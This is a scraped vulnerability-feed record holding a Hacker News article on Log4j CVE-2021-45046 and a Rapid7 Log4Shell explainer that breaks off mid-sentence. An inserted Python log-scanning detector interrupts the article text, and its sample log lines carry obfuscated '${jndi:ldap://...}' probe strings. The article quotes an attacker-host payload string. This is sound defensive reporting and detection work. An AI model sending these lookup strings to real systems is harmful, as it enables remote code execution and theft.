"https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEh5GtHaTHgh3Nb_v7QKaSLU1KeXKaQbBWPly6eg2ZtOxGICtbv9EpmiQmdjNHR4VMNIVtKcxHD6HrbAP366_7eDfOZmrYC88WifiIpeLTnG1mEBzu8jk3JoLEw3LKVw_jIjqTlNlRaGVKmSTOUmUCzbaKPFu2PMNGGgALR0wX1l4UiNCEC7zAhpZgV0>)\n\n**UPDATE \u2014** _The severity score of CVE-2021-45046, originally classified as a DoS bug, 
has since been revised from 3.7 to 9.0, to reflect the fact that an attacker could abuse the vulnerability to send a specially crafted string that leads to \"information leak and remote code execution in some environments and local code execution in all environments.\"_\n\nThe Apache Software Foundation (ASF) has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed [**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) exploit was deemed as \"incomplete in certain non-default configurations.\"\n\nThe second vulnerability \u2014 tracked as [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) \u2014 is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be abused to infiltrate and take over systems.\n\nThe incomplete patch for [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) could be abused to \"craft malicious input data using a [JNDI](<https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface>) Lookup pattern resulting in a denial-of-service (DoS) attack,\" the ASF [said](<https://logging.apache.org/log4j/2.x/security.html>) in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but [removes](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) support for message lookups and disables JNDI by default, the component that's at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12.2 when it becomes available.\n\n\"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues,\" Ralph Goers of the ASF [explained](<https://issues.apache.org/jira/browse/LOG4J2-3208>). 
\"While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it.\"\n\nJNDI, short for Java Naming and Directory Interface, is a Java API that lets a Java application look up objects and resources held in naming and directory services such as [LDAP](<https://en.wikipedia.org/wiki/LDAP>) servers. Log4Shell is resident in the Log4j library, an open-source, Java-based logging framework embedded in a large share of Java applications and server products.\n\nThe issue itself occurs when attacker-controlled input that contains a JNDI lookup, something like \"${jndi:ldap://attacker_controlled_website/payload_to_be_executed}\", is written to a log by a vulnerable version of the library: Log4j resolves the lookup, connects to the named LDAP (or RMI) server, and fetches a payload that it then loads and executes locally, so anyone who can get such a string logged gains code execution on the host.\n\nThe latest update arrives as fallout from the flaw has resulted in a \"true cyber pandemic,\" what with several threat actors seizing on Log4Shell in ways that lay the groundwork for [further](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) [attacks](<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html>), including deploying coin miners, remote access trojans, and ransomware on susceptible machines. 
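The two points above, that the payload is a logged "${jndi:...}" lookup and that attackers obfuscate it to slip past string matching, come together in detection. The following is an added example written for this page, not code from The Hacker News or from the Log4j project: it resolves the nesting tricks (lower/upper/date lookups, ":-" default values, URL encoding) with a small, deliberately approximate re-implementation of Log4j's lookup evaluation and then looks for the resulting jndi: URI. The access-log lines it runs over are constructed, and the 198.51.100.9 and 203.0.113.x addresses are documentation ranges.

```python
"""Detect Log4Shell lookup strings in web logs, including the obfuscated forms
attackers use to defeat plain string matching. Added example for this page (not
THN's or Log4j's code); the access-log lines below are constructed, and the
lookup resolution is a deliberately small approximation of Log4j's own."""
import re
from urllib.parse import unquote

# Innermost ${...}: a lookup whose body contains no further lookup.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_HIT = re.compile(r"JNDI\(([^)]*)\)")

def _resolve(body):
    """Evaluate one innermost lookup the way an obfuscated probe relies on it being evaluated."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return f"JNDI({rest})"          # the payload itself; rewritten to a marker the scan can find
    key, has_default, default = rest.partition(":-")
    if prefix.lower() == "lower":
        return key.lower()              # ${lower:J} -> j
    if prefix.lower() == "upper":
        return key.upper()
    if prefix.lower() == "date":
        return key.replace("'", "")     # ${date:'j'} prints the quoted literal
    # env:, sys:, main:, ctx: ... cannot be known here; probes that use them
    # carry a ':-' default so they resolve on any host (${env:NaN:-j} -> j).
    return default if has_default else ""

def normalize(s):
    """Undo URL encoding, then peel nested lookups from the inside out."""
    for _ in range(2):                  # double-encoded probes are common
        s = unquote(s)
    while (m := _INNER.search(s)):      # each pass removes one ${...}, so this terminates
        s = s[:m.start()] + _resolve(m.group(1)) + s[m.end():]
    return s

def find_jndi(line):
    """JNDI URIs embedded in one log line after de-obfuscation (empty list if clean)."""
    return _HIT.findall(normalize(line))

def scan(lines):
    """(index, uris) for every line that carries a lookup."""
    return [(i, uris) for i, line in enumerate(lines) if (uris := find_jndi(line))]

SAMPLE_LOG = [  # constructed access-log lines; addresses are documentation ranges
    '203.0.113.5 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:02 +0000] "GET /${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.9:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fc%7D"',
    '203.0.113.10 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${date:YYYY} HTTP/1.1" 200 64 "-" "-"',
]

if __name__ == "__main__":
    for i, uris in scan(SAMPLE_LOG):
        print(f"line {i}: JNDI lookup -> {', '.join(uris)}")
```

Run it over whole lines rather than one field: the lookup fires on whatever gets logged, so probes arrive in the URI, User-Agent, X-Forwarded-For, form fields and JSON bodies alike. The last sample line shows why a bare "${" match is too noisy (a harmless date lookup) and the third and fourth show why a bare "jndi" match is too narrow. The resolver is a hunting aid, not a control: it drops unresolvable lookups that Log4j would leave literal, and a probe using a lookup it does not model will slip through, which is one more reason the only real fix is the upgrade.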
The opportunistic intrusions are said to have commenced at least since December 1, although the bug became common knowledge on December 9.\n\nThe security flaw has sparked widespread alarm because it exists in a near-ubiquitously used logging framework in Java applications, presenting bad actors with an unprecedented gateway to penetrate and compromise millions of devices across the world.\n\nSpelling further trouble for organizations, the remotely exploitable flaw also impacts [hundreds](<https://github.com/NCSC-NL/log4shell>) of [major enterprise](<https://github.com/cisagov/log4j-affected-db>) products from a number of companies such as [Akamai](<https://developer.akamai.com/tools/integrations/siem/siem-cef-connector>), [Amazon](<https://aws.amazon.com/security/security-bulletins/AWS-2021-006/>), [Apache](<https://blogs.apache.org/foundation/entry/apache-log4j-cves>), [Apereo](<https://apereo.github.io/2021/12/11/log4j-vuln/>), [Atlassian](<https://confluence.atlassian.com/security/multiple-products-security-advisory-log4j-vulnerable-to-remote-code-execution-cve-2021-44228-1103069934.html>), [Broadcom](<https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793>), [Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd>), [Cloudera](<https://blog.cloudera.com/cloudera-response-to-cve-2021-44228/>), [ConnectWise](<https://www.connectwise.com/company/trust/advisories>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2021-44228>), [Docker](<https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/>), [Fortinet](<https://www.fortiguard.com/psirt/FG-IR-21-245>), [Google](<https://cloud.google.com/log4j2-security-advisory>), [IBM](<https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-websphere-application-server-cve-2021-44228/>), 
[Intel](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html>), [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259>), [Microsoft](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>), [Okta](<https://sec.okta.com/articles/2021/12/log4shell>), [Oracle](<https://blogs.oracle.com/security/post/cve-2021-44228>), [Red Hat](<https://access.redhat.com/security/vulnerabilities/RHSB-2021-009#updates-for-affected-products>), [SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-44228>), [SonicWall](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), [Splunk](<https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html>), [Ubuntu](<https://ubuntu.com/security/CVE-2021-44228>), [VMware](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), [Zscaler](<https://trust.zscaler.com/posts/9581>), and [Zoho](<https://pitstop.manageengine.com/portal/en/community/topic/apache-log4j-vulnerability-cve-2021-44228-1>), posing a significant software supply chain risk.\n\n\"Unlike other major cyberattacks that involve one or a limited number of software, Log4j is basically embedded in every Java based product or web service. It is very difficult to manually remediate it,\" Israeli security company Check Point [said](<https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/>). 
\"This vulnerability, because of the complexity in patching it and easiness to exploit, seems that it will stay with us for years to come, unless companies and services take immediate action to prevent the attacks on their products by implementing a protection.\"\n\nIn the days after the bug was disclosed, at least [ten different groups](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) have jumped in on the exploit bandwagon and roughly 44% of corporate networks globally already have been under attack, marking a significant escalation of sorts. Furthermore, criminal gangs acting as [access brokers](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) have begun using the vulnerability to gain initial foothold into target networks and then sell the access to ransomware-as-a-service (RaaS) affiliates.\n\nThis also encompasses nation-state actors originating from China, Iran, North Korea, and Turkey, with Microsoft [noting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) that the \"activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives.\"\n\nThe large-scale weaponization of the remote code execution flaw has prompted the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to add Log4Shell to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), giving federal agencies a deadline of December 24 to incorporate patches for the vulnerability and [urging vendors](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to \"immediately identify, mitigate, and patch affected products using Log4j.\"\n\nSean Gallagher, a senior threat researcher at Sophos, warned that \"adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on,\" adding \"there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability.\"\n\n\"The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere,\" Gallagher added.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T05:26:00", "type": "thn", "title": "Second Log4j Vulnerability (CVE-2021-45046) Discovered \u2014 New Patch Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T13:56:31", "id": "THN:602D65D576B090BAC4B0C96998F8F922", "href": "https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-11T19:27:04", "description": "\n\nIf you work in security, the chances are that you have spent the last several days urgently responding to the [Log4Shell vulnerability](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) (CVE-2021-44228), investigating where you have instances 
of Log4j in your environment, and questioning your vendors about their response. You have likely already read up on the implications and steps that need to be taken. This blog is for everyone else who wants to understand what\u2019s going on and why the internet seems to be on fire again. And for you security professionals, we\u2019ve also included some questions on the broader implications and long term view. You know, for all that spare time you have right now.\n\n## What is Log4Shell?\n\nLog4Shell \u2014 also known as CVE-2021-44228 \u2014 is a critical vulnerability that enables remote code execution in systems using the Apache Foundation\u2019s Log4j, which is an open-source Java library that is extensively used in commercial and open-source software products and utilities. For a more in-depth technical assessment of Log4Shell check out [Rapid7\u2019s AttackerKB analysis](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis>).\n\n## What is Log4j?\n\nLog4j is one of the most common tools for sending text to be stored in log files and/or databases. It is used in millions of applications and websites in every organization all across the internet. For example, information is sent to keep track of website visitors, note when warnings or errors occur in processing, and help support teams\u2019 triage problems.\n\n#### Get answers to your Log4Shell questions from our experts\n\n[Sign up for our webinar on Thursday, December 16](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\n \n\n\n## So what\u2019s the problem?\n\nIt turns out that Log4j doesn\u2019t just log plain strings. Text strings that are formatted a certain way will be executed just like a line from a computer program. The problem is that this allows malicious actors to manipulate computers all over the internet into taking actions without the computer owners\u2019 wishes or permission. 
Cyberattacks can use this to steal information, force actions, or extort the computer owners or operators.\n\nThis vulnerability is what we\u2019re referring to as Log4Shell, or CVE-2021-44228. Log4j is the vulnerable technology. As this is a highly evolving situation, you can always head over to our [main live blog](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) on Log4Shell.\n\n## Is it really that big of a deal?\n\nIn a word, yes.\n\nCaitlin Kiska, an information security engineer at Cardinal Health, [put it this way](<https://twitter.com/TheGamblingBird/status/1470518451198439426>): \"Imagine there is a specific kind of bolt used in most of the cars and car parts in the world, and they just said that bolt needs to be replaced.\" Glenn Thorpe, Rapid7's Emergent Threat Response Manager added, \"\u2026 and the presence of that bolt allows anyone to just take over the car.\"\n\nThe first issue is Log4j\u2019s widespread use. This little tool is used in countless systems across the internet, which makes remediation or mitigation of this into a huge task \u2014 and makes it more likely something might get missed.\n\nThe second issue is that attackers can use it in a variety of ways, so the sky is sort of the limit for them.\n\nPerhaps the biggest concern of all is that it\u2019s actually pretty easy to use the vulnerability for malicious purposes. Remote code execution vulnerabilities are always concerning, but you hope that they will be complicated to exploit and require specialist technical skill, limiting who can take advantage of them and slowing down the pace of attacks so that defenders can ideally take remediation action first. That\u2019s not the case with Log4Shell. 
Log4j interprets specially formatted text inside the data it logs, so as long as attackers know that format (which is not a secret) and can get a string into something the application logs, they can take advantage of this bug, and they currently are doing just that.\n\n## That sounds pretty bad. Is the situation hopeless?\n\nDefinitely not. The good news is that the Apache Foundation has [updated Log4j](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) to address the vulnerability. All organizations urgently need to check for the presence of this vulnerability in their environment and update affected systems to the latest patched version.\n\nThe first update \u2014 version 2.15.0 \u2014 was released on December 6, 2021. As exploitation ramped up in the wild, it became clear that the update did not fully remediate the issue in all use cases, a vulnerability that the National Vulnerability Database (NVD) codified as [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>).\n\nAs a result, on December 13, the Apache Foundation released [version 2.16.0](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>), which removes support for message lookups entirely and disables JNDI access by default, closing the door on this attack path and possibly adding to development team backlogs wherever application code relied on lookups inside log messages.\n\n## That sounds straightforward, right?\n\nUnfortunately, it\u2019s likely going to be a huge undertaking, requiring separate phases of discovery and remediation/mitigation.\n\n### Remediation\n\nThe first course of action is to identify all vulnerable applications, which can be a mix of vendor-supplied solutions and in-house developed applications. 
NCSC NL is [maintaining a list](<https://github.com/NCSC-NL/log4shell/blob/main/software/README.md>) of impacted software, but organizations are encouraged to monitor vendor advisories and releases directly for the most up-to-date information.\n\nFor in-house developed applications, organizations \u2014 at a minimum \u2014 need to update their Log4j libraries to the latest version (which, as of 2021-12-14, is 2.16) and apply the mitigations described in Rapid7's [initial blog post on CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j>), which includes setting the `log4j2.formatMsgNoLookups` system property in all Java startup scripts and strongly encourages updating Java virtual machine installations to the latest, safest versions. An additional resource, published by the Apache Security Team, provides a [curated list of all affected Apache projects](<https://blogs.apache.org/security/entry/cve-2021-44228>), which can be helpful to expedite identification and discovery.\n\nIf teams are performing \"remote\" checks (i.e., exploiting the vulnerability remotely as an attacker would) rather than local filesystem (\"authenticated\") checks, the remote checks should be run both by IP address and by fully qualified domain name/virtual host name, as there may be routing rules in play that scanning by IP address alone will not catch.\n\nThese mitigations must happen everywhere there is a vulnerable instance of Log4j. Do not assume that the issue applies only to internet-facing systems or live-running systems. There may be batch jobs that run hourly, daily, weekly, monthly, etc., on stored data that may contain exploit strings that could trigger execution.\n\n### Forensics\n\nAttacks have been active since at least December 1, 2021, and there is evidence this weakness has been known about since at least March of 2021. Therefore, it is quite prudent to adopt an \"assume breach\" mindset. 
NCSC NL has a [great resource page](<https://github.com/NCSC-NL/log4shell/blob/main/mitigation/README.md>) on ways you can detect exploitation attempts from application log files. Please be aware that this is not just a web-based attack. Initial, quite public, exploit showcases included changing the name of iOS devices and Tesla cars. Both those companies regularly pull metadata from their respective devices, and it seems those strings were passed to Log4j handlers somewhere in the processing chain. You should review logs from all internet-facing systems, as well as anywhere Log4j processing occurs.\n\nExploitation attempts will generally rely on pulling external resources in (as is common once initial access is gained), so behavioral detections may have already caught or stopped some attacks. The Log4j weakness also allows for rather clever data exfiltration paths, especially DNS. Attackers are pulling values from environment variables and from files at known filesystem paths and creating dynamic domain names from them, so the data leaves in the lookup request itself without any second-stage payload having to run. That means organizations should review DNS query logs going as far back as possible. Note: This could take quite a bit of time and effort, but it must be done to ensure you're not already a victim.\n\n### Proactive response\n\nOut of an abundance of caution, organizations should also consider re-numbering critical IP segments (where Log4j lived), changing host names on critical systems (where Log4j lived), and resetting credentials \u2014 especially those associated with Amazon AWS and other cloud providers \u2014 in the event they have already been exfiltrated.\n\n## Who should be paying attention to this?\n\nPretty much every organization, regardless of size, sector, or geography. If you have any kind of web presence or internet connectivity, you need to pay attention and check your status. 
If you outsource all the technical aspects of your business, ask your vendors what they are doing about this issue.\n\n## Who is exploiting it and how?\n\nKind of\u2026 _everyone_.\n\n\u201cBenign\u201d researchers (some independent, some part of cybersecurity firms) are using the exploit to gain an initial understanding of the base internet-facing attack surface.\n\n[Cyberattackers are also very active](<https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/>) and are racing to take advantage of this vulnerability before organizations can get their patches in place. Botnets, such as Mirai, have been adapted to use the exploit code to both exfiltrate sensitive data and gain initial access to systems (some deep within organizations).\n\nRansomware groups have already sprung into action and weaponized the Log4j weakness to compromise organizations. Rapid7\u2019s Project Heisenberg is [collecting and publishing samples](<https://github.com/rapid7/data/blob/master/log4shell/heisenberg/exploit-strings.txt>) of all the unique attempts seen since December 11, 2021.\n\n## How are things likely to develop?\n\nThese initial campaigns are only the beginning. Sophisticated attacks from more serious and capable groups will appear over the coming days, weeks, and months, and they\u2019ll likely focus on more enterprise-grade software that is known to be vulnerable.\n\nMost of the initial attack attempts are via website-focused injection points (input fields, search boxes, headers, etc.). There will be more advanced campaigns that hit API endpoints (even \u201chidden\u201d APIs that are part of company mobile apps) and try to find sneaky ways to get exploit strings past gate guards (like the iOS device renaming example).\n\nEven organizations that have remediated deployed applications might miss some virtual machine or container images that get spun up regularly or infrequently. 
The Log4Shell attacks are easily automatable, and we\u2019ll be seeing them as regularly as we see WannaCry and Conficker (yes, we still see quite a few exploits on the regular for those vulnerabilities).\n\n## Do we need to worry about similar vulnerabilities in other systems?\n\nIn the immediate term, security teams should narrow their attention to identify systems with the affected Log4j packages.\n\nFor the longer term, while it is impossible to forecast identification of similar vulnerabilities, we do know the ease and prevalence of CVE-2021-44228 demands the _continued_ attention (been a long weekend for many) of security, infrastructure, and application teams.\n\nAlong with Log4Shell, we also have [CVE-2021-4104](<https://access.redhat.com/security/cve/CVE-2021-4104>), reported on December 9, 2021: a flaw in the 1.x branch of Apache Log4j, whose JMSAppender is vulnerable to deserialization of untrusted data. It allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender with a JMS broker the attacker controls. Note that this flaw only affects applications that are specifically configured to use JMSAppender, which is not the default, or cases where the attacker has write access to the Log4j configuration and can point a JMSAppender at their own JMS broker.\n\nExploit vectors of Log4Shell and mitigations reported on Friday continue to evolve as [reported](<https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/>) by our partners at Snyk.io and Java Champion, Brian Vermeer \u2014 see \u201cEditor\u2019s note (Dec. 13, 2021)\u201d \u2014 therefore, continued vigilance on this near and present threat is time well spent. 
Postmortem exercises (and there will be many) should absolutely include efforts to evolve software, open-source, and package dependency inventories and, given current impacts, better model threats from packages with similar uninspected lookup behavior.\n\n## Does this issue indicate that we should stop compiling systems and go back to building from scratch?\n\nThere definitely has been chatter regarding the reliance upon so many third-party dependencies in all areas of software development. We've seen many attempts at poisoning numerous ecosystems this year, everything from Python to JavaScript, and now we have a critical vulnerability in a near-ubiquitous component.\n\nOn one hand, there is merit in relying solely on code you develop in-house, built on the core features in your programming language of choice. You can make an argument that this would make attackers\u2019 lives harder and reduce the bang they get for their buck.\n\nHowever, it seems a bit daft to fully forego the volumes of pre-built, feature-rich, and highly useful components. And let\u2019s not forget that not all software is created equally. The ideal is that community built and shared software will benefit from many more hands to the pump, more critical eyes, and a longer period to mature.\n\nThe lesson from the Log4Shell weakness seems pretty clear: Use, but verify, and support! Libraries such as Log4j benefit from wide community adoption, since they gain great features that can be harnessed quickly and effectively. However, you cannot just assume that all is and will be well in any given ecosystem, and you absolutely need to be part of the community vetting change and feature requests. 
If more eyes were on the initial request to add this fairly crazy feature (evaluating lookups inside log messages) and more security-savvy folks were in the approval stream, you would very likely not be reading this post right now (and it'd be one of the most boring Marvel \"What If\u2026?\" episodes ever).\n\nOrganizations should pull up a seat to the table, offer code creation and review support, and consider funding projects that become foundational or ubiquitous components in your application development environment.\n\n## How would a Software Bill of Materials (SBOM) have impacted this issue?\n\nA Bill of Materials is an inventory, by definition, and conceptually should contribute to speeding the discovery timeline during emergent vulnerability response exercises, such as the Log4j incident we are communally involved in now.\n\nAn SBOM is intended to be a formal record that contains the details and supply chain relationships of various components used in software, kind of like an ingredients list for technology. In this case, those components would include Java libraries used for logging (e.g. Log4j2).\n\nSBOM requirements were included in the [US Executive Order](<https://www.rapid7.com/blog/post/2017/05/12/white-house-cybersecurity-executive-order-summary/>) issued in May 2021. While there may be international variations, the concept and intended objectives are uniform. For that reason, I will reference US progress for simplicity.\n\n_From: The Minimum Elements For a Software Bill of Materials (SBOM), issued by the Department of Commerce, in coordination with the National Telecommunications and Information Administration (NTIA), Jul 12, 2021_\n\nThe question many Log4Shell responders \u2014 including CISOs, developers, engineers, sys admins, clients, and customers \u2014 are still grappling with is simply where affected versions of Log4j are in use within their technical ecosystems. 
Maintaining accurate inventories of assets has become increasingly challenging as our technical environments have become more complicated, interconnected, and wide-reaching. Our ever-growing reliance on internet-connected technologies and the rise of shadow IT only make this problem worse.\n\nVulnerabilities in tools like Log4j, which is used broadly in a vast array of technologies and systems, highlight the need for more transparency and automation for asset and inventory management. Perhaps the longer-term substantive impact from Log4Shell will be to refocus investments and appreciation for the importance of an accurate inventory of software and associated components through an SBOM that can easily be queried and linked to dependencies.\n\nThe bottom line is that if we had lived in a timeline where SBOMs were required and in place for all software projects, identifying impacted products, devices, and ecosystems would have been much easier than it has been for Log4Shell and remediation would likely be faster and more effective.\n\n## How does Log4Shell impact my regulatory status \u2014 do I need to take special action to ensure compliance?\n\nAccording to Rapid7\u2019s resident policy and compliance expert, Harley Geiger, \u201cRegulators may not have seen Log4Shell coming, but now that the vulnerability has been discovered, there will be an expectation that regulated companies address it. As organizations' security programs address this widespread and serious vulnerability, those actions should be aligned with compliance requirements and reporting. For many regulated companies, the discovery of Log4Shell triggers a need to re-assess the company's risks, the effectiveness of their safeguards to protect sensitive systems and information (including patching to the latest version), and the readiness of their incident response processes to address potential log4j exploitation. Many regulations also require these obligations to be passed on to service providers. 
If a Log4j exploitation results in a significant business disruption or breach of personal information, regulations may require the company to issue an incident report or breach notification.\u201d\n\n## We also asked Harley whether we\u2019re likely to see a public policy response. Here\u2019s what he said\u2026\n\n\u201cOn a federal policy level, organizations should expect a renewed push for adoption of SBOM to help identify the presence of Log4j (and other vulnerabilities) in products and environments going forward. CISA has also required federal agencies to expedite mitigation of Log4j and has ramped up information sharing related to the vulnerability. This may add wind to the sails of cyber incident reporting legislation that is circulating in Congress at present.\u201d\n\n## How do we know about all of this?\n\nWell, a bunch of kids started wreaking havoc with Minecraft servers, and things just went downhill from there. While there is some truth to that, the reality is that an issue was filed on the Log4j project in late November 2021. Proof-of-concept code was released in early December, and active attacks started shortly thereafter. Some cybersecurity vendors have evidence of preliminary attacks starting on December 1, 2021.\n\nAnyone monitoring the issue discussions (something developers, defenders, and attackers all do on the regular) would have noticed the gaping hole this \u201cfeature\u201d created.\n\n## How long has it been around?\n\nThere is evidence of a request for this functionality to be added dating back to 2013. A talk at Black Hat USA 2016 mentioned several JNDI injection remote code execution vectors in general but did not point to Log4j directly.\n\nSome proof-of-concept code targeting the JNDI lookup weakness in Log4j 2.x was also discovered back in March of 2021.\n\nFear, Uncertainty, and Doubt (FUD) is in copious supply today and likely to persist into the coming weeks and months. 
While adopting an \u201cassumed breach\u201d mindset isn\u2019t relevant for every celebrity vulnerability, the prevalence and transitive dependency of the Log4j library along with the sophisticated obfuscation exploit techniques we are witnessing in real time point out that the question we should be considering isn\u2019t, \u201cHow long has it been around?\u201d Rather, it is, \u201cHow long should we be mentally preparing ourselves (and setting expectations) to clean it up?\u201d\n\n_We are adding more questions as they come our way. If you have questions you\u2019d like answered, please let us know._\n\n**[UPDATE: December 17, 2021, 6 PM ET]**\n\n## I\u2019ve heard that the update doesn\u2019t work and you can still be exploited even if you have updated? Should I panic?\n\nIf you\u2019ve updated to either v2.15 (the original fix) or [v2.16](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) (the latest fix), you don\u2019t need to panic. It\u2019s true that the v2.15 update \u201cwas incomplete in certain non-default configurations,\u201d and that was designated as a separate vulnerability: CVE-2021-45046. But the key words here are** \u201cin certain non-default configurations.\u201d**\n\nEssentially, when a logging configuration uses a non-default Pattern Layout with a Context Lookup, attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. This can result in DoS attacks, and we\u2019ve now discovered it can also result in information leaks, and in some specific cases, RCE. This has resulted in the vulnerability being upgraded from a CVSS score of 3.7 to 9.0 on the [Apache Foundation website](<https://logging.apache.org/log4j/2.x/security.html>) \u2013 but the RCE is currently only being [reported for macOS](<https://twitter.com/GossiTheDog/status/1471791074314276867?s=20>), and no in-the-wild-exploitation has been publicly reported, so it still isn\u2019t time to panic. 
The bottom line is that you do need to update to v2.17 as soon as you can, but unless you have those non-default configurations, v2.15 probably has you covered.\n\n## I\u2019ve heard that there\u2019s now evidence of ransomware attacks against this vulnerability. Should I panic?\n\nIt is true that reports have started to appear of the ransomware group, Conti, leveraging CVE-2021-44228 (Log4Shell) to mount attacks. According to a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) from AdvIntel, Conti is testing exploitation by targeting vulnerable Log4j2 instances in VMware vCenter \u201cfor lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.\u201d While it\u2019s not time to panic about this, we do expect to see much more widespread ransom-based exploitation to follow in coming weeks, and this is another reason to ensure you are on the latest version ([v2.17](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.0>)) as soon as possible.\n\n## Is it OK to scan for vulnerable applications or systems?\n\nIf you own or lease systems and have appropriate 